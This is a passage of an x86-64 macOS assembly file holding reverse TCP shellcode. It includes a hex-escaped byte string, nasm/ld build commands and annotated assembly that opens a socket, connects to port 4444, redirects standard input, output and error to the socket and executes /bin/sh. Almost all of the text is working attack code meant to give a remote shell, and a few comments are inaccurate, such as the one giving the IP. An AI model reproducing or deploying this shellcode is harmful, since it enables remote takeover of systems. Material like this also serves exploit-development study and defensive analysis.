;"\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" + 22 | ;"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" + 23 | ;"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" + 24 | ;"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" + 25 | ;"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" + 26 | ;"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05" 27 | 28 | ;nasm -f macho reverse_tcp.s -o reverse_tcp.o 29 | ;ld -o reverse_tcp -e start reverse_tcp.o 30 | 31 | BITS 64 32 | 33 | section .text 34 | global start 35 | 36 | start: 37 | mov r8b, 0x02 ; unix class system calls = 2 38 | shl r8, 24 ; shift left 24 to the upper order bits 39 | or r8, 0x61 ; socket is 0x61 40 | mov rax, r8 ; put socket syscall # into rax 41 | 42 | ;Socket 43 | xor rdx, rdx ; zero out rdx 44 | mov rsi, rdx ; AF_NET = 1 45 | inc rsi ; rsi = AF_NET 46 | mov rdi, rsi ; SOCK_STREAM = 2 47 | inc rdi ; rdi = SOCK_STREAM 48 | syscall ; call socket(SOCK_STREAM, AF_NET, 0); 49 | 50 | mov r12, rax ; Save the socket 51 | 52 | ;Sock_addr 53 | mov r13, 0x0100007f5C110101 ; IP = FFFFFFFF, Port = 5C11(4444) 54 | mov r9b, 0xFF ; The sock_addr_in is + FF from where we need it 55 | sub r13, r9 ; So we sub 0xFF from it to get the correct value and avoid a null 56 | push r13 ; Push it on the stack 57 | mov r13, rsp ; Save the sock_addr_in into r13 58 | 59 | 60 | ;Connect 61 | inc r8 ; Connect = 0x62, so we inc by one from the previous syscall 62 | mov rax, r8 ; move that into rax 63 | mov rdi, r12 ; move the saved socket fd into rdi 64 | mov rsi, r13 ; move the saved sock_addr_in into rsi 65 | add rdx, 0x10 ; add 0x10 to rdx 66 | syscall ; call connect(rdi, rsi, rdx) 67 | 68 | sub r8, 0x8 ; subtract 8 from r8 for the next syscall dup2 0x90 69 | xor rsi, rsi ; zero out rsi 70 | 71 | dup: 72 | mov rax, r8 ; move the syscall for dup2 into rax 73 | mov rdi, r12 ; move the FD for the socket into rdi 74 | syscall ; call dup2(rdi, rsi) 75 | 76 | cmp rsi, 0x2 ; check to see if we are still under 2 77 | inc rsi ; inc rsi 78 | jbe dup ; jmp if less than 2 79 | 80 | sub r8, 0x1F ; setup the exec syscall at 0x3b 81 | mov rax, r8 ; move the syscall into rax 82 | 83 | ;exec 84 | xor rdx, rdx ; zero out rdx 85 | mov r13, 0x68732f6e69622fFF ; '/bin/sh' in hex 86 | shr r13, 8 ; shift right to create the null terminator 87 | push r13 ; push to the stack 88 | mov rdi, rsp ; move the command from the stack to rdi 89 | xor rsi, rsi ; zero out rsi 90 | syscall ; call exec(rdi, 0, 0) 91 | 92 | --------------------------------------------------------------------------------